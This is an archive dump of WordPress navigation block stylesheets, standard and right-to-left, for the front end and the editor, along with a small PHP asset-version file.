.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-container{
  padding-top:var(--wp--style--block-gap, 2em);
}
.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation-item__content{
  padding:0;
}
.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation-item,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-page-list{
  align-items:var(--navigation-layout-justification-setting, initial);
  display:flex;
  flex-direction:column;
}
.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation-item,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation-item .wp-block-navigation__submenu-container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-page-list{
  background:#0000 !important;
  color:inherit !important;
}
.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container{
  left:auto;
  right:auto;
}
@media (min-width:600px){
  .wp-block-navigation__responsive-container:not(.hidden-by-default):not(.is-menu-open){
    background-color:inherit;
    display:block;
    position:relative;
    width:100%;
    z-index:auto;
  }
  .wp-block-navigation__responsive-container:not(.hidden-by-default):not(.is-menu-open) .wp-block-navigation__responsive-container-close{
    display:none;
  }
  .wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container{
    right:0;
  }
}

.wp-block-navigation:not(.has-background) .wp-block-navigation__responsive-container.is-menu-open{
  background-color:#fff;
}

.wp-block-navigation:not(.has-text-color) .wp-block-navigation__responsive-container.is-menu-open{
  color:#000;
}

.wp-block-navigation__toggle_button_label{
  font-size:1rem;
  font-weight:700;
}

.wp-block-navigation__responsive-container-close,.wp-block-navigation__responsive-container-open{
  background:#0000;
  border:none;
  color:currentColor;
  cursor:pointer;
  margin:0;
  padding:0;
  text-transform:inherit;
  vertical-align:middle;
}
.wp-block-navigation__responsive-container-close svg,.wp-block-navigation__responsive-container-open svg{
  fill:currentColor;
  display:block;
  height:24px;
  pointer-events:none;
  width:24px;
}

.wp-block-navigation__responsive-container-open{
  display:flex;
}
.wp-block-navigation__responsive-container-open.wp-block-navigation__responsive-container-open.wp-block-navigation__responsive-container-open{
  font-family:inherit;
  font-size:inherit;
  font-weight:inherit;
}
@media (min-width:600px){
  .wp-block-navigation__responsive-container-open:not(.always-shown){
    display:none;
  }
}

.wp-block-navigation__responsive-container-close{
  left:0;
  position:absolute;
  top:0;
  z-index:2;
}
.wp-block-navigation__responsive-container-close.wp-block-navigation__responsive-container-close.wp-block-navigation__responsive-container-close{
  font-family:inherit;
  font-size:inherit;
  font-weight:inherit;
}

.wp-block-navigation__responsive-close{
  width:100%;
}
.has-modal-open .wp-block-navigation__responsive-close{
  margin-left:auto;
  margin-right:auto;
  max-width:var(--wp--style--global--wide-size, 100%);
}
.wp-block-navigation__responsive-close:focus{
  outline:none;
}

.is-menu-open .wp-block-navigation__responsive-close,.is-menu-open .wp-block-navigation__responsive-container-content,.is-menu-open .wp-block-navigation__responsive-dialog{
  box-sizing:border-box;
}

.wp-block-navigation__responsive-dialog{
  position:relative;
}

.has-modal-open .admin-bar .is-menu-open .wp-block-navigation__responsive-dialog{
  margin-top:46px;
}
@media (min-width:782px){
  .has-modal-open .admin-bar .is-menu-open .wp-block-navigation__responsive-dialog{
    margin-top:32px;
  }
}

html.has-modal-open{
  overflow:hidden;
}navigation/editor.min.css000060400000026644151330427370011502 0ustar00.editor-styles-wrapper .wp-block-navigation ul{margin-bottom:0;margin-left:0;margin-top:0;padding-left:0}.editor-styles-wrapper .wp-block-navigation .wp-block-navigation-item.wp-block{margin:revert}.wp-block-navigation-item__label{display:inline}.wp-block-navigation-item,.wp-block-navigation__container{background-color:inherit}.wp-block-navigation:not(.is-selected):not(.has-child-selected) .has-child:hover>.wp-block-navigation__submenu-container{opacity:0;visibility:hidden}.has-child.has-child-selected>.wp-block-navigation__submenu-container,.has-child.is-selected>.wp-block-navigation__submenu-container{display:flex;opacity:1;visibility:visible}.is-dragging-components-draggable .has-child.is-dragging-within>.wp-block-navigation__submenu-container{opacity:1;visibility:visible}.is-editing>.wp-block-navigation__container{display:flex;flex-direction:column;opacity:1;visibility:visible}.is-dragging-components-draggable .wp-block-navigation-link>.wp-block-navigation__container{opacity:1;visibility:hidden}.is-dragging-components-draggable .wp-block-navigation-link>.wp-block-navigation__container .block-editor-block-draggable-chip-wrapper{visibility:visible}.is-editing>.wp-block-navigation__submenu-container>.block-list-appender{display:block;position:static;width:100%}.is-editing>.wp-block-navigation__submenu-container>.block-list-appender .block-editor-button-block-appender{background:#1e1e1e;border-radius:2px;color:#fff;margin-left:auto;margin-right:0;padding:0;width:24px}.wp-block-navigation__submenu-container .block-list-appender{display:none}.block-library-colors-selector{width:auto}.block-library-colors-selector .block-library-colors-selector__toggle{display:block;margin:0 auto;padding:3px;width:auto}.block-library-colors-selector .block-library-colors-selector__icon-container{align-items:center;border-radius:4px;display:flex;height:30px;margin:0 auto;padding:3px;position:relative}.block-library-colors-selector .block-library-colors-selector__state-selection{border-radius:11px;box-shadow:inset 0 0 0 1px #0003;height:22px;line-height:20px;margin-left:auto;margin-right:auto;min-height:22px;min-width:22px;padding:2px;width:22px}.block-library-colors-selector .block-library-colors-selector__state-selection>svg{min-width:auto!important}.block-library-colors-selector .block-library-colors-selector__state-selection.has-text-color>svg,.block-library-colors-selector .block-library-colors-selector__state-selection.has-text-color>svg path{color:inherit}.block-library-colors-selector__popover .color-palette-controller-container{padding:16px}.block-library-colors-selector__popover .components-base-control__label{height:20px;line-height:20px}.block-library-colors-selector__popover .component-color-indicator{float:right;margin-top:2px}.block-library-colors-selector__popover .components-panel__body-title{display:none}.wp-block-navigation .wp-block+.block-list-appender .block-editor-button-block-appender{background-color:#1e1e1e;color:#fff}.wp-block-navigation .wp-block+.block-list-appender .block-editor-button-block-appender.block-editor-button-block-appender.block-editor-button-block-appender{padding:0}.wp-block-navigation .wp-block .wp-block .block-editor-button-block-appender{background-color:initial;color:#1e1e1e}@keyframes loadingpulse{0%{opacity:1}50%{opacity:.5}to{opacity:1}}.components-placeholder.wp-block-navigation-placeholder{background:none;box-shadow:none;color:inherit;min-height:0;outline:none;padding:0}.components-placeholder.wp-block-navigation-placeholder .components-placeholder__fieldset{font-size:inherit}.components-placeholder.wp-block-navigation-placeholder .components-placeholder__fieldset .components-button{margin-bottom:0}.wp-block-navigation.is-selected .components-placeholder.wp-block-navigation-placeholder{color:#1e1e1e}.wp-block-navigation-placeholder__preview{align-items:center;background:#0000;color:currentColor;display:flex;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;min-width:96px}.wp-block-navigation.is-selected .wp-block-navigation-placeholder__preview{display:none}.wp-block-navigation-placeholder__preview:before{border:1px dashed;border-radius:2px;border-radius:inherit;bottom:0;content:"";display:block;left:0;pointer-events:none;position:absolute;right:0;top:0}.wp-block-navigation-placeholder__preview:before:before{background:currentColor;bottom:0;content:"";left:0;opacity:.1;pointer-events:none;position:absolute;right:0;top:0}.wp-block-navigation-placeholder__preview>svg{fill:currentColor}.wp-block-navigation.is-vertical .is-medium .components-placeholder__fieldset,.wp-block-navigation.is-vertical .is-small .components-placeholder__fieldset{min-height:90px}.wp-block-navigation.is-vertical .is-large .components-placeholder__fieldset{min-height:132px}.wp-block-navigation-placeholder__controls,.wp-block-navigation-placeholder__preview{align-items:flex-start;flex-direction:row;padding:6px 8px}.wp-block-navigation-placeholder__controls{background-color:#fff;border-radius:2px;box-shadow:inset 0 0 0 1px #1e1e1e;display:none;float:left;position:relative;width:100%;z-index:1}.wp-block-navigation.is-selected .wp-block-navigation-placeholder__controls{display:flex}.is-medium .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator,.is-medium .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator+hr,.is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator,.is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator+hr{display:none}.is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions,.wp-block-navigation.is-vertical .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions{align-items:flex-start;flex-direction:column}.is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions hr,.wp-block-navigation.is-vertical .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions hr{display:none}.wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__icon{height:36px;margin-right:12px}.wp-block-navigation-placeholder__actions__indicator{align-items:center;display:flex;height:36px;justify-content:flex-start;line-height:0;margin-left:4px;padding:0 6px 0 0}.wp-block-navigation-placeholder__actions__indicator svg{margin-right:4px;fill:currentColor}.wp-block-navigation .components-placeholder.is-medium .components-placeholder__fieldset{flex-direction:row!important}.wp-block-navigation-placeholder__actions{align-items:center;display:flex;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;gap:6px;height:100%}.wp-block-navigation-placeholder__actions .components-dropdown,.wp-block-navigation-placeholder__actions>.components-button{margin-right:0}.wp-block-navigation-placeholder__actions.wp-block-navigation-placeholder__actions hr{background-color:#1e1e1e;border:0;height:100%;margin:auto 0;max-height:16px;min-height:1px;min-width:1px}@media (min-width:600px){.wp-block-navigation__responsive-container:not(.is-menu-open) .components-button.wp-block-navigation__responsive-container-close{display:none}}.wp-block-navigation__responsive-container.is-menu-open{position:fixed;top:155px}@media (min-width:782px){.wp-block-navigation__responsive-container.is-menu-open{left:36px;top:93px}}@media (min-width:960px){.wp-block-navigation__responsive-container.is-menu-open{left:160px}}@media (min-width:782px){.has-fixed-toolbar .wp-block-navigation__responsive-container.is-menu-open{top:141px}}.is-mobile-preview .wp-block-navigation__responsive-container.is-menu-open,.is-tablet-preview .wp-block-navigation__responsive-container.is-menu-open{top:141px}.is-fullscreen-mode .wp-block-navigation__responsive-container.is-menu-open{left:0;top:155px}@media (min-width:782px){.is-fullscreen-mode .wp-block-navigation__responsive-container.is-menu-open{top:61px}.is-fullscreen-mode .has-fixed-toolbar .wp-block-navigation__responsive-container.is-menu-open{top:109px}}.is-fullscreen-mode .is-mobile-preview .wp-block-navigation__responsive-container.is-menu-open,.is-fullscreen-mode .is-tablet-preview .wp-block-navigation__responsive-container.is-menu-open{top:109px}body.editor-styles-wrapper .wp-block-navigation__responsive-container.is-menu-open{bottom:0;left:0;right:0;top:0}.components-button.wp-block-navigation__responsive-container-close.wp-block-navigation__responsive-container-close,.components-button.wp-block-navigation__responsive-container-open.wp-block-navigation__responsive-container-open{color:inherit;height:auto;padding:0}.components-heading.wp-block-navigation-off-canvas-editor__title{margin:0}.wp-block-navigation-off-canvas-editor__header{margin-bottom:8px}.is-menu-open .wp-block-navigation__responsive-container-content * .block-list-appender{margin-top:16px}@keyframes fadein{0%{opacity:0}to{opacity:1}}.wp-block-navigation__loading-indicator-container{padding:8px 12px}.wp-block-navigation .wp-block-navigation__uncontrolled-inner-blocks-loading-indicator{margin-top:0}@keyframes fadeouthalf{0%{opacity:1}to{opacity:.5}}.wp-block-navigation-delete-menu-button{justify-content:center;margin-bottom:16px;width:100%}.components-button.is-link.wp-block-navigation-manage-menus-button{margin-bottom:16px}.wp-block-navigation__overlay-menu-preview{align-items:center;background-color:#f0f0f0;display:flex;height:64px;justify-content:space-between;margin-bottom:12px;padding:0 24px;width:100%}.wp-block-navigation__overlay-menu-preview.open{background-color:#fff;box-shadow:inset 0 0 0 1px #e0e0e0;outline:1px solid #0000}.wp-block-navigation-placeholder__actions hr+hr,.wp-block-navigation__toolbar-menu-selector.components-toolbar-group:empty{display:none}.wp-block-navigation__navigation-selector{margin-bottom:16px;width:100%}.wp-block-navigation__navigation-selector-button{border:1px solid;justify-content:space-between;width:100%}.wp-block-navigation__navigation-selector-button__icon{flex:0 0 auto}.wp-block-navigation__navigation-selector-button__label{flex:0 1 auto;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.wp-block-navigation__navigation-selector-button--createnew{border:1px solid;margin-bottom:16px;width:100%}.wp-block-navigation__responsive-container-open.components-button{opacity:1}.wp-block-navigation__menu-inspector-controls{overflow-x:auto;scrollbar-color:#0000 #0000;scrollbar-gutter:stable both-edges;scrollbar-width:thin;will-change:transform}.wp-block-navigation__menu-inspector-controls::-webkit-scrollbar{height:12px;width:12px}.wp-block-navigation__menu-inspector-controls::-webkit-scrollbar-track{background-color:initial}.wp-block-navigation__menu-inspector-controls::-webkit-scrollbar-thumb{background-clip:padding-box;background-color:initial;border:3px solid #0000;border-radius:8px}.wp-block-navigation__menu-inspector-controls:focus-within::-webkit-scrollbar-thumb,.wp-block-navigation__menu-inspector-controls:focus::-webkit-scrollbar-thumb,.wp-block-navigation__menu-inspector-controls:hover::-webkit-scrollbar-thumb{background-color:#949494}.wp-block-navigation__menu-inspector-controls:focus,.wp-block-navigation__menu-inspector-controls:focus-within,.wp-block-navigation__menu-inspector-controls:hover{scrollbar-color:#949494 #0000}@media (hover:none){.wp-block-navigation__menu-inspector-controls{scrollbar-color:#949494 #0000}}.wp-block-navigation__menu-inspector-controls__empty-message{margin-left:24px}navigation/view-modal.min.asset.php000060400000000124151330427370013356 0ustar00<?php return array('dependencies' => array(), 'version' => 'b478fa3cd1475dec97d3');
navigation/style-rtl.min.css000060400000040007151330427370012140 0ustar00.wp-block-navigation{position:relative;--navigation-layout-justification-setting:flex-start;--navigation-layout-direction:row;--navigation-layout-wrap:wrap;--navigation-layout-justify:flex-start;--navigation-layout-align:center}.wp-block-navigation ul{margin-bottom:0;margin-right:0;margin-top:0;padding-right:0}.wp-block-navigation ul,.wp-block-navigation ul li{list-style:none;padding:0}.wp-block-navigation .wp-block-navigation-item{align-items:center;background-color:inherit;display:flex;position:relative}.wp-block-navigation .wp-block-navigation-item .wp-block-navigation__submenu-container:empty{display:none}.wp-block-navigation .wp-block-navigation-item__content{display:block}.wp-block-navigation .wp-block-navigation-item__content.wp-block-navigation-item__content{color:inherit}.wp-block-navigation.has-text-decoration-underline .wp-block-navigation-item__content,.wp-block-navigation.has-text-decoration-underline .wp-block-navigation-item__content:active,.wp-block-navigation.has-text-decoration-underline .wp-block-navigation-item__content:focus{text-decoration:underline}.wp-block-navigation.has-text-decoration-line-through .wp-block-navigation-item__content,.wp-block-navigation.has-text-decoration-line-through .wp-block-navigation-item__content:active,.wp-block-navigation.has-text-decoration-line-through .wp-block-navigation-item__content:focus{text-decoration:line-through}.wp-block-navigation :where(a),.wp-block-navigation :where(a:active),.wp-block-navigation :where(a:focus){text-decoration:none}.wp-block-navigation .wp-block-navigation__submenu-icon{align-self:center;background-color:inherit;border:none;color:currentColor;display:inline-block;font-size:inherit;height:.6em;line-height:0;margin-right:.25em;padding:0;width:.6em}.wp-block-navigation .wp-block-navigation__submenu-icon svg{display:inline-block;stroke:currentColor;height:inherit;margin-top:.075em;width:inherit}.wp-block-navigation.is-vertical{--navigation-layout-direction:column;--navigation-layout-justify:initial;--navigation-layout-align:flex-start}.wp-block-navigation.no-wrap{--navigation-layout-wrap:nowrap}.wp-block-navigation.items-justified-center{--navigation-layout-justification-setting:center;--navigation-layout-justify:center}.wp-block-navigation.items-justified-center.is-vertical{--navigation-layout-align:center}.wp-block-navigation.items-justified-right{--navigation-layout-justification-setting:flex-end;--navigation-layout-justify:flex-end}.wp-block-navigation.items-justified-right.is-vertical{--navigation-layout-align:flex-end}.wp-block-navigation.items-justified-space-between{--navigation-layout-justification-setting:space-between;--navigation-layout-justify:space-between}.wp-block-navigation .has-child .wp-block-navigation__submenu-container{align-items:normal;background-color:inherit;color:inherit;display:flex;flex-direction:column;height:0;opacity:0;overflow:hidden;position:absolute;right:-1px;top:100%;transition:opacity .1s linear;visibility:hidden;width:0;z-index:2}.wp-block-navigation .has-child .wp-block-navigation__submenu-container>.wp-block-navigation-item>.wp-block-navigation-item__content{display:flex;flex-grow:1}.wp-block-navigation .has-child .wp-block-navigation__submenu-container>.wp-block-navigation-item>.wp-block-navigation-item__content .wp-block-navigation__submenu-icon{margin-left:0;margin-right:auto}.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation-item__content{margin:0}@media (min-width:782px){.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{right:100%;top:-1px}.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container:before{background:#0000;content:"";display:block;height:100%;left:100%;position:absolute;width:.5em}.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-icon{margin-left:.25em}.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-icon svg{transform:rotate(90deg)}}.wp-block-navigation .has-child .wp-block-navigation-submenu__toggle[aria-expanded=true]~.wp-block-navigation__submenu-container,.wp-block-navigation .has-child:not(.open-on-click):hover>.wp-block-navigation__submenu-container,.wp-block-navigation .has-child:not(.open-on-click):not(.open-on-hover-click):focus-within>.wp-block-navigation__submenu-container{height:auto;min-width:200px;opacity:1;overflow:visible;visibility:visible;width:auto}.wp-block-navigation.has-background .has-child .wp-block-navigation__submenu-container{right:0;top:100%}@media (min-width:782px){.wp-block-navigation.has-background .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{right:100%;top:0}}.wp-block-navigation-submenu{display:flex;position:relative}.wp-block-navigation-submenu .wp-block-navigation__submenu-icon svg{stroke:currentColor}button.wp-block-navigation-item__content{background-color:initial;border:none;color:currentColor;font-family:inherit;font-size:inherit;font-style:inherit;font-weight:inherit;letter-spacing:inherit;line-height:inherit;text-align:right;text-transform:inherit}.wp-block-navigation-submenu__toggle{cursor:pointer}.wp-block-navigation-item.open-on-click .wp-block-navigation-submenu__toggle{padding-left:.85em;padding-right:0}.wp-block-navigation-item.open-on-click .wp-block-navigation-submenu__toggle+.wp-block-navigation__submenu-icon{margin-right:-.6em;pointer-events:none}.wp-block-navigation-item.open-on-click button.wp-block-navigation-item__content:not(.wp-block-navigation-submenu__toggle){padding:0}.wp-block-navigation .wp-block-page-list,.wp-block-navigation__container,.wp-block-navigation__responsive-close,.wp-block-navigation__responsive-container,.wp-block-navigation__responsive-container-content,.wp-block-navigation__responsive-dialog{gap:inherit}:where(.wp-block-navigation.has-background .wp-block-navigation-item a:not(.wp-element-button)),:where(.wp-block-navigation.has-background .wp-block-navigation-submenu a:not(.wp-element-button)){padding:.5em 1em}:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-item a:not(.wp-element-button)),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-submenu a:not(.wp-element-button)),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-submenu button.wp-block-navigation-item__content),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-pages-list__item button.wp-block-navigation-item__content){padding:.5em 1em}.wp-block-navigation.items-justified-right .wp-block-navigation__container .has-child .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-right .wp-block-page-list>.has-child .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between .wp-block-page-list>.has-child:last-child .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .wp-block-navigation__submenu-container{left:0;right:auto}.wp-block-navigation.items-justified-right .wp-block-navigation__container .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-right .wp-block-page-list>.has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between .wp-block-page-list>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{left:-1px;right:-1px}@media (min-width:782px){.wp-block-navigation.items-justified-right .wp-block-navigation__container .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-right .wp-block-page-list>.has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between .wp-block-page-list>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{left:100%;right:auto}}.wp-block-navigation:not(.has-background) .wp-block-navigation__submenu-container{background-color:#fff;border:1px solid #00000026}.wp-block-navigation.has-background .wp-block-navigation__submenu-container{background-color:inherit}.wp-block-navigation:not(.has-text-color) .wp-block-navigation__submenu-container{color:#000}.wp-block-navigation__container{align-items:var(--navigation-layout-align,initial);display:flex;flex-direction:var(--navigation-layout-direction,initial);flex-wrap:var(--navigation-layout-wrap,wrap);justify-content:var(--navigation-layout-justify,initial);list-style:none;margin:0;padding-right:0}.wp-block-navigation__container .is-responsive{display:none}.wp-block-navigation__container:only-child,.wp-block-page-list:only-child{flex-grow:1}@keyframes overlay-menu__fade-in-animation{0%{opacity:0;transform:translateY(.5em)}to{opacity:1;transform:translateY(0)}}.wp-block-navigation__responsive-container{bottom:0;display:none;left:0;position:fixed;right:0;top:0}.wp-block-navigation__responsive-container :where(.wp-block-navigation-item a){color:inherit}.wp-block-navigation__responsive-container .wp-block-navigation__responsive-container-content{align-items:var(--navigation-layout-align,initial);display:flex;flex-direction:var(--navigation-layout-direction,initial);flex-wrap:var(--navigation-layout-wrap,wrap);justify-content:var(--navigation-layout-justify,initial)}.wp-block-navigation__responsive-container:not(.is-menu-open.is-menu-open){background-color:inherit!important;color:inherit!important}.wp-block-navigation__responsive-container.is-menu-open{animation:overlay-menu__fade-in-animation .1s ease-out;animation-fill-mode:forwards;background-color:inherit;display:flex;flex-direction:column;overflow:auto;padding:clamp(1rem,var(--wp--style--root--padding-top),20rem) clamp(1rem,var(--wp--style--root--padding-left),20em) clamp(1rem,var(--wp--style--root--padding-bottom),20rem) clamp(1rem,var(--wp--style--root--padding-right),20rem);z-index:100000}@media (prefers-reduced-motion:reduce){.wp-block-navigation__responsive-container.is-menu-open{animation-delay:0s;animation-duration:1ms}}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content{align-items:var(--navigation-layout-justification-setting,inherit);display:flex;flex-direction:column;flex-wrap:nowrap;overflow:visible;padding-top:calc(2rem + 24px)}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-page-list{justify-content:flex-start}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-icon{display:none}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .has-child .wp-block-navigation__submenu-container{border:none;height:auto;min-width:200px;opacity:1;overflow:initial;padding-left:2rem;padding-right:2rem;position:static;visibility:visible;width:auto}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-container{gap:inherit}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-container{padding-top:var(--wp--style--block-gap,2em)}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation-item__content{padding:0}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation-item,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-page-list{align-items:var(--navigation-layout-justification-setting,initial);display:flex;flex-direction:column}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation-item,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation-item .wp-block-navigation__submenu-container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-page-list{background:#0000!important;color:inherit!important}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container{left:auto;right:auto}@media (min-width:600px){.wp-block-navigation__responsive-container:not(.hidden-by-default):not(.is-menu-open){background-color:inherit;display:block;position:relative;width:100%;z-index:auto}.wp-block-navigation__responsive-container:not(.hidden-by-default):not(.is-menu-open) .wp-block-navigation__responsive-container-close{display:none}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container{right:0}}.wp-block-navigation:not(.has-background) .wp-block-navigation__responsive-container.is-menu-open{background-color:#fff}.wp-block-navigation:not(.has-text-color) .wp-block-navigation__responsive-container.is-menu-open{color:#000}.wp-block-navigation__toggle_button_label{font-size:1rem;font-weight:700}.wp-block-navigation__responsive-container-close,.wp-block-navigation__responsive-container-open{background:#0000;border:none;color:currentColor;cursor:pointer;margin:0;padding:0;text-transform:inherit;vertical-align:middle}.wp-block-navigation__responsive-container-close svg,.wp-block-navigation__responsive-container-open svg{fill:currentColor;display:block;height:24px;pointer-events:none;width:24px}.wp-block-navigation__responsive-container-open{display:flex}.wp-block-navigation__responsive-container-open.wp-block-navigation__responsive-container-open.wp-block-navigation__responsive-container-open{font-family:inherit;font-size:inherit;font-weight:inherit}@media (min-width:600px){.wp-block-navigation__responsive-container-open:not(.always-shown){display:none}}.wp-block-navigation__responsive-container-close{left:0;position:absolute;top:0;z-index:2}.wp-block-navigation__responsive-container-close.wp-block-navigation__responsive-container-close.wp-block-navigation__responsive-container-close{font-family:inherit;font-size:inherit;font-weight:inherit}.wp-block-navigation__responsive-close{width:100%}.has-modal-open .wp-block-navigation__responsive-close{margin-left:auto;margin-right:auto;max-width:var(--wp--style--global--wide-size,100%)}.wp-block-navigation__responsive-close:focus{outline:none}.is-menu-open .wp-block-navigation__responsive-close,.is-menu-open .wp-block-navigation__responsive-container-content,.is-menu-open .wp-block-navigation__responsive-dialog{box-sizing:border-box}.wp-block-navigation__responsive-dialog{position:relative}.has-modal-open .admin-bar .is-menu-open .wp-block-navigation__responsive-dialog{margin-top:46px}@media (min-width:782px){.has-modal-open .admin-bar .is-menu-open .wp-block-navigation__responsive-dialog{margin-top:32px}}html.has-modal-open{overflow:hidden}navigation/editor-rtl.min.css000060400000026650151330427370012276 0ustar00.editor-styles-wrapper .wp-block-navigation ul{margin-bottom:0;margin-right:0;margin-top:0;padding-right:0}.editor-styles-wrapper .wp-block-navigation .wp-block-navigation-item.wp-block{margin:revert}.wp-block-navigation-item__label{display:inline}.wp-block-navigation-item,.wp-block-navigation__container{background-color:inherit}.wp-block-navigation:not(.is-selected):not(.has-child-selected) .has-child:hover>.wp-block-navigation__submenu-container{opacity:0;visibility:hidden}.has-child.has-child-selected>.wp-block-navigation__submenu-container,.has-child.is-selected>.wp-block-navigation__submenu-container{display:flex;opacity:1;visibility:visible}.is-dragging-components-draggable .has-child.is-dragging-within>.wp-block-navigation__submenu-container{opacity:1;visibility:visible}.is-editing>.wp-block-navigation__container{display:flex;flex-direction:column;opacity:1;visibility:visible}.is-dragging-components-draggable .wp-block-navigation-link>.wp-block-navigation__container{opacity:1;visibility:hidden}.is-dragging-components-draggable .wp-block-navigation-link>.wp-block-navigation__container .block-editor-block-draggable-chip-wrapper{visibility:visible}.is-editing>.wp-block-navigation__submenu-container>.block-list-appender{display:block;position:static;width:100%}.is-editing>.wp-block-navigation__submenu-container>.block-list-appender .block-editor-button-block-appender{background:#1e1e1e;border-radius:2px;color:#fff;margin-left:0;margin-right:auto;padding:0;width:24px}.wp-block-navigation__submenu-container .block-list-appender{display:none}.block-library-colors-selector{width:auto}.block-library-colors-selector .block-library-colors-selector__toggle{display:block;margin:0 auto;padding:3px;width:auto}.block-library-colors-selector .block-library-colors-selector__icon-container{align-items:center;border-radius:4px;display:flex;height:30px;margin:0 auto;padding:3px;position:relative}.block-library-colors-selector .block-library-colors-selector__state-selection{border-radius:11px;box-shadow:inset 0 0 0 1px #0003;height:22px;line-height:20px;margin-left:auto;margin-right:auto;min-height:22px;min-width:22px;padding:2px;width:22px}.block-library-colors-selector .block-library-colors-selector__state-selection>svg{min-width:auto!important}.block-library-colors-selector .block-library-colors-selector__state-selection.has-text-color>svg,.block-library-colors-selector .block-library-colors-selector__state-selection.has-text-color>svg path{color:inherit}.block-library-colors-selector__popover .color-palette-controller-container{padding:16px}.block-library-colors-selector__popover .components-base-control__label{height:20px;line-height:20px}.block-library-colors-selector__popover .component-color-indicator{float:left;margin-top:2px}.block-library-colors-selector__popover .components-panel__body-title{display:none}.wp-block-navigation .wp-block+.block-list-appender .block-editor-button-block-appender{background-color:#1e1e1e;color:#fff}.wp-block-navigation .wp-block+.block-list-appender .block-editor-button-block-appender.block-editor-button-block-appender.block-editor-button-block-appender{padding:0}.wp-block-navigation .wp-block .wp-block 